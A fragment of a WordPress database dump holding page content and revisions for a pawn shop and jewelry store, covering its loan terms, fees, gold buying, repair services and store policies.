Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\" alignleft wp-image-211 \" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-1024x651.jpg\" alt=\"Guns\" width=\"624\" height=\"397\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','publish','closed','open','','loans','','','2015-03-10 22:20:19','2015-03-11 05:20:19','',0,'http://atgjewelry.com/fuze7/?page_id=34',0,'page','',0),(114,2,'2015-02-23 18:51:49','2015-02-24 02:51:49','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n \r\n\r\n[/one_half]\r\n[one_half]\r\nWe loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! <strong>Sorry, we cannot accept plated or gold-filled jewelry.</strong>\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of electronics - Video games </strong>\r\n<img src=\"http://atgjewelry.com/images/video-games.png\" alt=\"\" width=\"280\" height=\"186\" /></div>\r\n<div class=\"loans-guitar\"><strong>Guitars</strong>\r\n<img src=\"http://atgjewelry.com/images/guitars.png\" alt=\"\" width=\"202\" height=\"186\" /></div>\r\n<div class=\"loans-firearms\"><strong>Firearms</strong>\r\n<img src=\"http://atgjewelry.com/images/firearms.jpg\" alt=\"\" width=\"279\" height=\"186\" /></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-02-23 18:51:49','2015-02-24 02:51:49','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(35,2,'2015-02-08 20:48:00','2015-02-08 20:48:00','<h2>Quick and Easy..Cash Loans Today!</h2>\r\n<ul class=\"listing-check\">\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss it\'s loan value with you.</li>\r\n <li>We will explain the terms, and go over any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..its just that easy!</li>\r\n</ul>\r\n</ul>\r\n \r\n\r\n<img src=\"http://atgjewelry.com/images/lone-img.png\" alt=\"\" width=\"277\" height=\"188\" /> Loan Terms:\r\n\r\nLoans are held for 60 days, and may be extended longer by paying a finance charge. Finance charge is made up of the following: (all fees based on the amount you borrow)\r\n<ul class=\"listing-check\">\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, also any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Notification Fee: On loans of $1500.00 or more a fee of $5.00 plus postage.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n</ul>\r\n<img src=\"http://atgjewelry.com/images/lone-img1.png\" alt=\"\" width=\"184\" height=\"102\" />\r\n\r\n \r\n\r\nWe loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in we\'ll take a look at it and try to give you the most cash we can! <strong>Sorry, we cannot accept plated or gold filled jewelry.</strong>\r\n<img src=\"http://atgjewelry.com/images/lone-img2.png\" alt=\"\" width=\"279\" height=\"187\" />\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of electronics - Video games </strong>\r\n<img src=\"http://atgjewelry.com/images/video-games.png\" alt=\"\" width=\"280\" height=\"186\" />\r\n\r\n</div>\r\n<div class=\"loans-guitar\"><strong>Guitars</strong>\r\n<img src=\"http://atgjewelry.com/images/guitars.png\" alt=\"\" width=\"202\" height=\"186\" />\r\n\r\n</div>\r\n<div class=\"loans-firearms\"><strong>Firearms</strong>\r\n<img src=\"http://atgjewelry.com/images/firearms.jpg\" alt=\"\" width=\"279\" height=\"186\" />\r\n\r\n</div>\r\n</div>','Loans','','inherit','open','open','','34-revision-v1','','','2015-02-08 20:48:00','2015-02-08 20:48:00','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(36,2,'2015-02-08 20:48:55','2015-02-08 20:48:55','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n<ul class=\"listing-check\">\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss it\'s loan value with you.</li>\r\n <li>We will explain the terms, and go over any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..its just that easy!</li>\r\n</ul>\r\n</ul>\r\n \r\n\r\n<img src=\"http://atgjewelry.com/images/lone-img.png\" alt=\"\" width=\"277\" height=\"188\" /> Loan Terms:\r\n\r\nLoans are held for 60 days, and may be extended longer by paying a finance charge. Finance charge is made up of the following: (all fees based on the amount you borrow)\r\n<ul class=\"listing-check\">\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, also any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Notification Fee: On loans of $1500.00 or more a fee of $5.00 plus postage.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n</ul>\r\n<img src=\"http://atgjewelry.com/images/lone-img1.png\" alt=\"\" width=\"184\" height=\"102\" />\r\n\r\n \r\n\r\nWe loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in we\'ll take a look at it and try to give you the most cash we can! <strong>Sorry, we cannot accept plated or gold filled jewelry.</strong>\r\n<img src=\"http://atgjewelry.com/images/lone-img2.png\" alt=\"\" width=\"279\" height=\"187\" />\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of electronics - Video games </strong>\r\n<img src=\"http://atgjewelry.com/images/video-games.png\" alt=\"\" width=\"280\" height=\"186\" /></div>\r\n<div class=\"loans-guitar\"><strong>Guitars</strong>\r\n<img src=\"http://atgjewelry.com/images/guitars.png\" alt=\"\" width=\"202\" height=\"186\" /></div>\r\n<div class=\"loans-firearms\"><strong>Firearms</strong>\r\n<img src=\"http://atgjewelry.com/images/firearms.jpg\" alt=\"\" width=\"279\" height=\"186\" /></div>\r\n</div>','Loans','','inherit','open','open','','34-revision-v1','','','2015-02-08 20:48:55','2015-02-08 20:48:55','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(37,2,'2015-02-08 21:29:36','2015-02-08 21:29:36','[row_fluid]\r\n[one_half]\r\nYou can bring your gold, silver or platinum into any one of All That Glitters five convenient locations for a free assessment and cash offer. Our buyers will work to offer you the best cash price in town, and you can walk away with cash in hand in a matter of minutes.\r\n\r\nWhy deal with the hassle and risk of mail order gold buyers when you can come into a state licensed legitimate local business and safely sell your unwanted gold? Come in today for a free evaluation of your unwanted jewelry items. Broken, missing stones we buy it all.\r\n\r\n[/one_half]\r\n[one_half]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry-e1426031253556.jpg\"><img class=\"aligncenter wp-image-223 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry-e1426031253556-1024x723.jpg\" alt=\"\" width=\"604\" height=\"426\" /></a>\r\n[/one_half]\r\n[/row_fluid]','We Buy Gold','','publish','closed','open','','we-buy-gold','','','2015-03-10 16:48:22','2015-03-10 23:48:22','',0,'http://atgjewelry.com/fuze7/?page_id=37',0,'page','',0),(38,2,'2015-02-08 20:49:38','2015-02-08 20:49:38','You can bring your gold, silver or platinum into any one of All That Glitters five convenient locations for a free assessment and cash offer. Our buyers will work to offer you the best cash price in town, and you can walk away with cash in hand in a matter of minutes.\r\n\r\n \r\n\r\nWhy deal with the hassle and risk of mail order gold buyers when you can come into a state licensed legitimate local business and safely sell your unwanted gold? Come in today for a free evaluation of your unwanted jewelry items. Broken, missing stones we buy it all.','We Buy Gold','','inherit','open','open','','37-revision-v1','','','2015-02-08 20:49:38','2015-02-08 20:49:38','',37,'http://atgjewelry.com/fuze7/37-revision-v1/',0,'revision','',0),(39,2,'2015-02-08 21:19:45','2015-02-09 05:19:45','<div class=\"home-content-area\">\r\n\r\n[row_fluid]\r\n[one_half]\r\nBuying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us. Just bring in an original purchase receipt that\'s in your name.\r\n\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipt, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. Be sure you bring in an original receipt in your name. That\'s all there is to it.\r\n\r\n[/one_half]\r\n[one_half]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Colored-Rings.jpg\"><img class=\"aligncenter wp-image-215 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Colored-Rings-1024x683.jpg\" alt=\"Gold Jewelry\" width=\"604\" height=\"403\" /></a>\r\n[/one_half]\r\n[/row_fluid]\r\n\r\n</div>','Jewelry','','publish','closed','open','','jewelry','','','2015-03-10 16:33:48','2015-03-10 23:33:48','',0,'http://atgjewelry.com/fuze7/?page_id=39',0,'page','',0),(40,2,'2015-02-08 20:51:01','2015-02-08 20:51:01','Buying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipts, come in to one of our 5 locations, and select a piece that is valued at $50.00 more than your last one. That\'s all there is to it.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us, as long as you have your original purchase receipt.','Wholesale Jewelry','','inherit','open','open','','39-revision-v1','','','2015-02-08 20:51:01','2015-02-08 20:51:01','',39,'http://atgjewelry.com/fuze7/39-revision-v1/',0,'revision','',0),(41,2,'2015-02-08 20:52:06','2015-02-08 20:52:06','<div class=\"home-content-area\">\r\n\r\n[row_fluid]\r\n[one_half]\r\nYour fine jewelry is designed to last a lifetime - with the proper care. That\'s why we offer a complete range of on-site jewelry repair services that include :\r\n\r\n• Jewelry repairs and cleaning/polishing\r\n• Jewelry mounting & remounting\r\n• Stone replacement & retipping prongs\r\n• Plating & antiquing\r\n• Chain & Bracelet soldering, clasp repair\r\n• Change earring backs, replace posts\r\n• Watch Battery Replacement (Average sizes, No divers watches, please)\r\n\r\n[/one_half]\r\n[one_half]\r\nWe offer every day low prices on our jewelry repair and our jeweler can provide you with a free estimate before doing any work. We pride ourselves in quality work, so we evaluate every piece before taking them in to repair. Our jewelers guarantee their work, partial repairs will not be accepted to ensure the piece given back to you will be in exceptional condition.\r\n<h3></h3>\r\n<h3>Have a question or need an expert opinion?</h3>\r\nOur jewelers are more than happy to share their ideas with you. We service Platinum and 10K, 14K and 18K solid gold jewelry. We do not service gold plated, gold filled jewelry or other metals.[/one_half]\r\n[/row_fluid]\r\n\r\n</div>','Jewelry Repair','','publish','closed','open','','jewelry-repair','','','2015-03-10 16:26:41','2015-03-10 23:26:41','',0,'http://atgjewelry.com/fuze7/?page_id=41',0,'page','',0),(42,2,'2015-02-08 20:51:51','2015-02-08 20:51:51','<div class=\"home-content-area\">\r\n\r\nYour fine jewelry is designed to last a lifetime - with the proper care. That\'s why we offer a complete range of on-site jewelry repair services that include :\r\n\r\n• Jewelry repairs and cleaning/polishing\r\n• Jewelry mounting & remounting\r\n• Stone replacement & retipping prongs\r\n• Plating & antiquing\r\n• Chain & Bracelet soldering, clasp repair\r\n• Change earring backs, replace posts\r\n• Watch Battery Replacement (Average sizes, No divers watches, please)\r\n\r\nWe offer every day low prices on our jewelry repair and our jeweler can provide you with a free estimate before doing any work. We pride ourselves in quality work, so we evaluate every piece before taking them in to repair. Our jewelers guarantee their work, partial repairs will not be accepted to ensure the piece given back to you will be in exceptional condition.\r\n<h3>Have a question or need an expert opinion?</h3>\r\nOur jewelers are more than happy to share their ideas with you. We service Platinum and 10K, 14K and 18K solid gold jewelry. We do not service gold plated, gold filled jewelry or other metals.\r\n\r\n</div>','Jewelry Repair','','inherit','open','open','','41-revision-v1','','','2015-02-08 20:51:51','2015-02-08 20:51:51','',41,'http://atgjewelry.com/fuze7/41-revision-v1/',0,'revision','',0),(43,2,'2015-02-08 20:52:44','2015-02-08 20:52:44','','Craigslist','','publish','open','closed','','craigslist','','','2015-02-23 19:10:28','2015-02-24 03:10:28','',0,'http://atgjewelry.com/fuze7/?page_id=43',0,'page','',0),(44,2,'2015-02-08 20:52:44','2015-02-08 20:52:44','','Craigslist','','inherit','open','open','','43-revision-v1','','','2015-02-08 20:52:44','2015-02-08 20:52:44','',43,'http://atgjewelry.com/fuze7/43-revision-v1/',0,'revision','',0),(45,2,'2015-02-08 21:26:35','2015-02-08 21:26:35','[row_fluid]\r\n[one_half]\r\n<h3>Layaway Policy</h3>\r\n<ul class=\"listing-check\">\r\n <li>Layaways are good for 90 days and require a 20% down payment.</li>\r\n <li>Jewelry Purchase: If you change your mind within the first seven days following the date a jewelry item is put into layaway, you are entitled to receive a refund in the amount of the down payment.</li>\r\n <li>If you change your mind after seven days following the date a jewelry item is put into layaway, you will be given an in-store credit for any monies paid.</li>\r\n <li>Hard good Purchase: If, at any time during the 90 day layaway period, you change your mind regarding a layaway purchase, you will not receive a cash refund, but you will be given an in-store credit for the amount of monies paid.</li>\r\n <li>If you do not complete payment of an item within the 90-day layaway period, you can request an in-store credit within one year of the original date of the layaway. After one year, the funds are forfeited.</li>\r\n</ul>\r\n<h3>Stone Replacement Guarantee</h3>\r\n<ul class=\"listing-check\">\r\n <li>Subject to 6-month in-house inspection</li>\r\n <li>The customer is responsible for completing all maintenance suggested by All That Glitters at the time of inspection. All That Glitters Stone Replacement Guarantee is not in effect if the customer chooses not to maintain the jewelry.</li>\r\n <li>Customer’s receipt must be presented at each inspection.</li>\r\n <li>This policy guarantees loss of stones due to normal wear and does not cover abuse of jewelry (ie: banging of jewelry against hard surfaces).</li>\r\n</ul>\r\n<h3>Refund Policy</h3>\r\n<ul class=\"listing-check\">\r\n <li>Jewelry items are given a 7-day money back guarantee in the same form of payment made.</li>\r\n <li>Laptops and Tablets are given a 72-hour warranty. If the equipment isn\'t working, just bring it back along with your original receipt within 72 hours for a full refund.</li>\r\n <li>After 7 days (up to 30) you will receive in-store credit in the form of a gift card.</li>\r\n <li>After 30 days, you also have the option to sell your jewelry back for half of the amount paid. Offer only good for original purchaser, and you must have the original sales receipt. You may also get a loan on your item any time as long as you keep your receipt. Loans are calculated at half of the amount paid. Original receipt must be presented at every loan transaction.</li>\r\n <li>All other merchandise is given a 30-day functional guarantee. You can exchange merchandise if it is not working for a like item, or receive a gift card for the amount you paid.</li>\r\n <li>Clearance case items are AS-IS. No refund, exchange or trade-in allowed.</li>\r\n <li>All claims and goods MUST be accompanied by the purchaser and the original sales receipt.</li>\r\n</ul>\r\n[/one_half]\r\n[one_half]\r\n<h3>Trade-Up Policy</h3>\r\n\r\nAll That Glitters offers a wonderful trade-up policy allowing you to upgrade your jewelry purchase at a minimum cost of $50.00.Just keep your original sales receipt, and when you are ready to upgrade your jewelry, bring it in. All That Glitters will give you full value of what you paid towards your next purchase. You only need to spend an additional $50.00 on the new item.\r\n<ul class=\"listing-check\">\r\n <li>Trade-ins must be made at 50% of retail.</li>\r\n <li>Sorry, only one item for one item is allowed. The Policy is set up so you can keep upgrading into the size stone you love.</li>\r\n <li>Jewelry must be accompanied by a receipt and the person named on the receipt. This offer excludes hard good items and items stamped AS IS.</li>\r\n <li>Please note trade-up purchases are sold as-is only. No refunds of any kind are granted on a trade-up purchase.</li>\r\n</ul>\r\n<h3>Privacy Policy</h3>\r\n<p class=\"check\">All That Glitters collects customer information to improve your overall shopping experience with us. We respect your privacy and are committed to maintaining and using this information responsibly.</p>\r\nWe collect non-public personal information about you as a consumer, customer or former customer from the following sources:\r\n<ul class=\"listing-check\">\r\n <li>Information we receive from you on our loan contracts, buy forms, sales documents or other forms.</li>\r\n <li>Information about your transactions with us, our affiliates or others.</li>\r\n</ul>\r\n<p class=\"check\">We do not disclose any non-public information about our customers or former customers to anyone, except to our affiliates and as permitted by law. We do not give out information over the phone to anyone including you. You must appear in person and present valid ID for us to look up your account information.</p>\r\nWe restrict access to non-public personal information about you to those employees who need that information to provide products or services to you, and maintain safeguards that restrict access to your non-public personal information.\r\n\r\n<h3>Policy Changes and Questions</h3>\r\n<p class=\"check\">All That Glitters may update our privacy policy from time to time and use of the information we collect is now subject to the privacy policy in effect at the time of use. If you have any questions or concerns regarding our privacy policy, please contact us.</p>\r\n[/one_half]\r\n[/row_fluid]','Guidelines/Policies','','publish','closed','open','','guidelinespolicies','','','2015-03-09 14:50:19','2015-03-09 21:50:19','',31,'http://atgjewelry.com/fuze7/?page_id=45',0,'page','',0),(46,2,'2015-02-08 20:54:33','2015-02-08 20:54:33','<h3>Layaway Policy</h3>\r\n<ul class=\"listing-check\">\r\n <li>Layaways are good for 90 days and require a 20% down payment.</li>\r\n <li>Jewelry Purchase: If you change your mind within the first seven days following the date a jewelry item is put into layaway, you are entitled to receive a refund in the amount of the down payment.</li>\r\n <li>If you change your mind after seven days following the date a jewelry item is put into layaway, you will be given an in store credit for any monies paid.</li>\r\n <li>Hard good Purchase: If, at any time during the 90 day layaway period, you change your mind regarding a layaway purchase, you will not receive a cash refund, but you will be given an in store credit for the amount of monies paid.</li>\r\n <li>If you do not complete payment of any item within the 90 day layaway period, you can request an in store credit within one year of the original date of the layaway. After one year, the funds are forfeited.</li>\r\n</ul>\r\nStone Replacement Guarantee\r\n<ul class=\"listing-check\">\r\n <li>Subject to 6 month in-house inspection</li>\r\n <li>The customer is responsible for completing all maintenance suggested by All That Glitters at the time of inspection. All That Glitters Stone Replacement Guarantee is not in effect if the customer chooses not to maintain the jewelry.</li>\r\n <li>Customer’s receipt must be presented at each inspection.</li>\r\n <li>This policy guarantees loss of stones due to normal wear and does not cover abuse of jewelry (ie: banging of jewelry against hard surfaces).</li>\r\n</ul>\r\nRefund Policy\r\n<ul class=\"listing-check\">\r\n <li>Jewelry items are given a 7 day money back guarantee in the same form of payment made.</li>\r\n <li>After 7 days (up to 30) you will receive in store credit in the form of a gift card.</li>\r\n <li>After 30 days, you also have the option to sell your jewelry back for half of the amount paid. Offer only good for original purchaser, and you must have the original sales receipt. You may also get a loan on your item any time as long as you keep your receipt. Loans are calculated at half of the amount paid. Original receipt must be presented at every loan transaction.</li>\r\n <li>All other merchandise is given a 30 day functional guarantee. You can exchange merchandise if it is not working for a like item, or receive a gift card for the amount you paid.</li>\r\n <li>Clearance case items are AS-IS. No refund, exchange or trade in allowed.</li>\r\n <li>All claims and goods MUST be accompanied by the purchaser and the original sales receipt.</li>\r\n</ul>\r\nTrade-Up Policy\r\n<ul class=\"listing-check\">\r\n <li>All That Glitters offers a wonderful trade up policy allowing you to upgrade your jewelry purchase at a minimum cost of $50.00.</li>\r\n <li>Just keep your original sales receipt, and when you are ready to upgrade your jewelry, bring it in. All That Glitters will give you full value of what you paid towards your next purchase. You only need to spend an additional $50.00 on the new item.</li>\r\n <li>Trade-ins must be made at 50% of retail.</li>\r\n <li>Sorry, only one item for one item is allowed. The Policy is set up so you can keep upgrading into the size stone you love.</li>\r\n <li>Jewelry must be accompanied by a receipt and the person named on the receipt. This offer excludes hard good items and items stamped AS IS.</li>\r\n</ul>\r\nPrivacy Policy\r\n<p class=\"check\">All That Glitters collects customer information to improve your overall shopping experience with us. We respect your privacy and are committed to maintaining and using this information responsibly.\r\n\r\nWe collect non-public personal information about you as a consumer, customer or former customer from the following sources:</p>\r\n\r\n<ul class=\"listing-check\">\r\n <li>Information we receive from you on our loan contracts, buy forms, sales documents or other forms.</li>\r\n <li>Information about your transactions with us, our affiliates or others.</li>\r\n</ul>\r\n<p class=\"check\">We do not disclose any non-public information about our customers or former customers to anyone, except to our affiliates and as permitted by law. We do not give out information over the phone to anyone including you. You must be in person and you must present valid ID for us to look up your account.\r\n\r\nWe restrict access to non-public personal information about you to those employees who need to know that information to provide products or services to you and maintain safeguards that restrict access to your non-public personal information.</p>\r\nPolicy Changes and Questions\r\n<p class=\"check\">All That Glitters may update our privacy policy from time to time and use of the information we collect is now subject to the privacy policy in effect at the time of use. If you have any questions or concerns regarding our privacy policy, please contact us.</p>','Guidelines/Policies','','inherit','open','open','','45-revision-v1','','','2015-02-08 20:54:33','2015-02-08 20:54:33','',45,'http://atgjewelry.com/fuze7/45-revision-v1/',0,'revision','',0),(47,2,'2015-02-08 20:59:52','2015-02-08 20:59:52','<h3>Layaway Policy</h3>\r\n<ul class=\"listing-check\">\r\n <li>Layaways are good for 90 days and require a 20% down payment.</li>\r\n <li>Jewelry Purchase: If you change your mind within the first seven days following the date a jewelry item is put into layaway, you are entitled to receive a refund in the amount of the down payment.</li>\r\n <li>If you change your mind after seven days following the date a jewelry item is put into layaway, you will be given an in store credit for any monies paid.</li>\r\n <li>Hard good Purchase: If, at any time during the 90 day layaway period, you change your mind regarding a layaway purchase, you will not receive a cash refund, but you will be given an in store credit for the amount of monies paid.</li>\r\n <li>If you do not complete payment of any item within the 90 day layaway period, you can request an in store credit within one year of the original date of the layaway. After one year, the funds are forfeited.</li>\r\n</ul>\r\nStone Replacement Guarantee\r\n<ul class=\"listing-check\">\r\n <li>Subject to 6 month in-house inspection</li>\r\n <li>The customer is responsible for completing all maintenance suggested by All That Glitters at the time of inspection. All That Glitters Stone Replacement Guarantee is not in effect if the customer chooses not to maintain the jewelry.</li>\r\n <li>Customer’s receipt must be presented at each inspection.</li>\r\n <li>This policy guarantees loss of stones due to normal wear and does not cover abuse of jewelry (ie: banging of jewelry against hard surfaces).</li>\r\n</ul>\r\nRefund Policy\r\n<ul class=\"listing-check\">\r\n <li>Jewelry items are given a 7 day money back guarantee in the same form of payment made.</li>\r\n <li>After 7 days (up to 30) you will receive in store credit in the form of a gift card.</li>\r\n <li>After 30 days, you also have the option to sell your jewelry back for half of the amount paid. Offer only good for original purchaser, and you must have the original sales receipt. You may also get a loan on your item any time as long as you keep your receipt. Loans are calculated at half of the amount paid. Original receipt must be presented at every loan transaction.</li>\r\n <li>All other merchandise is given a 30 day functional guarantee. You can exchange merchandise if it is not working for a like item, or receive a gift card for the amount you paid.</li>\r\n <li>Clearance case items are AS-IS. No refund, exchange or trade in allowed.</li>\r\n <li>All claims and goods MUST be accompanied by the purchaser and the original sales receipt.</li>\r\n</ul>\r\nTrade-Up Policy\r\n<ul class=\"listing-check\">\r\n <li>All That Glitters offers a wonderful trade up policy allowing you to upgrade your jewelry purchase at a minimum cost of $50.00.</li>\r\n <li>Just keep your original sales receipt, and when you are ready to upgrade your jewelry, bring it in. All That Glitters will give you full value of what you paid towards your next purchase. You only need to spend an additional $50.00 on the new item.</li>\r\n <li>Trade-ins must be made at 50% of retail.</li>\r\n <li>Sorry, only one item for one item is allowed. The Policy is set up so you can keep upgrading into the size stone you love.</li>\r\n <li>Jewelry must be accompanied by a receipt and the person named on the receipt. This offer excludes hard good items and items stamped AS IS.</li>\r\n</ul>\r\nPrivacy Policy\r\n<p class=\"check\">All That Glitters collects customer information to improve your overall shopping experience with us. We respect your privacy and are committed to maintaining and using this information responsibly.</p>\r\nWe collect non-public personal information about you as a consumer, customer or former customer from the following sources:\r\n<ul class=\"listing-check\">\r\n <li>Information we receive from you on our loan contracts, buy forms, sales documents or other forms.</li>\r\n <li>Information about your transactions with us, our affiliates or others.</li>\r\n</ul>\r\n<p class=\"check\">We do not disclose any non-public information about our customers or former customers to anyone, except to our affiliates and as permitted by law. We do not give out information over the phone to anyone including you. You must be in person and you must present valid ID for us to look up your account.</p>\r\nWe restrict access to non-public personal information about you to those employees who need to know that information to provide products or services to you and maintain safeguards that restrict access to your non-public personal information.\r\n\r\nPolicy Changes and Questions\r\n<p class=\"check\">All That Glitters may update our privacy policy from time to time and use of the information we collect is now subject to the privacy policy in effect at the time of use. If you have any questions or concerns regarding our privacy policy, please contact us.</p>','Guidelines/Policies','','inherit','open','open','','45-revision-v1','','','2015-02-08 20:59:52','2015-02-08 20:59:52','',45,'http://atgjewelry.com/fuze7/45-revision-v1/',0,'revision','',0),(48,2,'2015-02-08 21:05:07','2015-02-08 21:05:07','[banner img=\"/fuze7/wp-content/uploads/2015/03/guitar-390.jpg\" banner_link=\"/fuze7/loans\" title=\"Guitars\" text=\"We have guitars\" btn_text=\" \" target=\"_self\"]\r\n\r\n[banner img=\"/fuze7/wp-content/uploads/2015/03/ring-390.jpg\" banner_link=\"/fuze7/jewelry\" title=\"Jewelry\" text=\"We have jewelry\" btn_text=\" \" target=\"_self\"]\r\n\r\n[banner img=\"/fuze7/wp-content/uploads/2015/03/gun-390.jpg\" banner_link=\"/fuze7/loans\" title=\"Guns\" text=\"We have guns\" btn_text=\" \" target=\"_self\"]\r\n[clear]\r\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified 